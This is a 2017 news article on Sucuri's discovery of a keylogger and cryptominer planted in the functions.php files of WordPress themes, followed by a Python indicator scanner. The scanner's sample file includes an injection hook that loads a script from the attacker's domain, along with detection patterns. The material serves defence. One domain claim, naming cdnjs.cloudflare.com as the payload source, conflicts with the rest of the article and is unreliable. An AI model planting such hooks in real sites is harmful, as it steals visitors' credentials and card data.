More than 5,000 WordPress websites plagued with Keylogger

December 7th, 2017 Waqas Security, Malware 0 comments

WordPress is one of the most widely used platforms in the world, with more than 75 million websites running its content management system (CMS), and that alone is reason enough for hackers to target WordPress-based websites.

Old malware new capabilities

Recently, researchers at website security platform Sucuri discovered that 5,500 WordPress websites are infected with malware that was initially identified in April this year as Cloudflare.solutions. At that time, the malware had cryptomining capabilities; now it also comes equipped with a keylogger.

The malware lives in the functions.php file used by WordPress themes. From there it enqueues Cloudflare[.]solutions scripts, using a fake CloudFlare domain in the URLs, which loads a copy of the legitimate ReconnectingWebSocket library.

What has changed since April

Previously, when researchers identified the fake domain, its homepage displayed the message “This Server is part of Cloudflare Distribution Network,” but the new message claims “This server is part of an experimental science machine learning algorithms project.”

Another change identified by researchers is the cors.js script. Once decoded, it contains no outright suspicious code like the banner images in the previous version. However, the script loads Yandex.Metrika, Yandex’s alternative to Google Analytics.

Furthermore, Sucuri researchers found two fake CloudFlare domains, one of which carries long hexadecimal parameters. These domains might look legitimate, but one of them does not exist, while the other one (cdnjs.cloudflare.com) delivers payloads encoded as hexadecimal numbers after the question mark in the URLs. According to the researchers, the script decodes that payload and injects the result into web pages, turning it into a keylogger.

[Image: the decoded keylogger script (Image Credit: Sucuri)]

This script adds a handler to every input field on the website that sends the field’s value to the attacker (wss://cloudflare[.]solutions:8085/) when the user leaves that field, wrote Sucuri’s malware researcher Denis Sinegubko.

What does this keylogger do

The keylogger is designed to steal login credentials from WordPress sites, and its prime targets are e-commerce platforms, where it can steal customers’ banking and card payment details. If the platform requires users to log in with their social media details, personal email address or any other sensitive data, the keylogger will steal that too and send it to the attackers.

[Image: WebSocket traffic on an infected login page (Image Credit: Sucuri)]

The Cloudflare.solutions malware also injects websites with CoinHive cryptocurrency miner scripts that use visitors’ CPU power to mine Monero digital coins.

What WordPress site owners should do

Since the malicious code for this malware lives in the functions.php file of the WordPress theme, Sucuri advises users to “remove the add_js_scripts function and all the add_action clauses that mention add_js_scripts.”

WordPress site owners are strongly advised to check whether their site is infected with the Cloudflare.solutions malware and to change all login credentials, including usernames and passwords. If you are looking for tips on how to secure your WordPress site from ongoing threats, follow this link.
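As an added illustration of the check described above (not code from Sucuri or from the article), the following script scans theme functions.php files for the indicators the article names: an add_js_scripts function, add_action hooks that register it, and references to the cloudflare.solutions domain. The sample functions.php is constructed, and the regular expressions are assumptions about how the indicators appear in plain source; obfuscated variants would need wider patterns.

```python
import re
from pathlib import Path

# Constructed sample of an infected theme functions.php, modelled on the
# indicators the article lists. The injected script body itself is elided.
SAMPLE_FUNCTIONS_PHP = """<?php
function theme_setup() {
    add_theme_support('title-tag');
}
add_action('after_setup_theme', 'theme_setup');

function add_js_scripts() {
    echo '<script src="https://cloudflare.solutions/cors.js"></script>';
}
add_action('wp_head', 'add_js_scripts');
add_action('login_enqueue_scripts', 'add_js_scripts');
"""

# Indicator patterns (assumed source forms of the names given in the article).
INDICATORS = {
    "add_js_scripts function": re.compile(r"function\s+add_js_scripts\s*\("),
    "add_action hooking add_js_scripts": re.compile(
        r"add_action\s*\([^)]*['\"]add_js_scripts['\"]"),
    "cloudflare.solutions reference": re.compile(
        r"cloudflare\.solutions", re.IGNORECASE),
}


def scan_source(text):
    """Return (line_number, indicator_name, line_text) for every hit."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                hits.append((lineno, name, line.strip()))
    return hits


def scan_theme_dir(root):
    """Scan every functions.php below a wp-content/themes directory."""
    results = {}
    for path in Path(root).rglob("functions.php"):
        hits = scan_source(path.read_text(errors="replace"))
        if hits:
            results[str(path)] = hits
    return results


if __name__ == "__main__":
    for lineno, name, line in scan_source(SAMPLE_FUNCTIONS_PHP):
        print(f"line {lineno}: {name}: {line}")
```

Each hit points at a line to remove by hand; after cleaning, rotate all site credentials as the article advises, since the keylogger may already have captured them.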
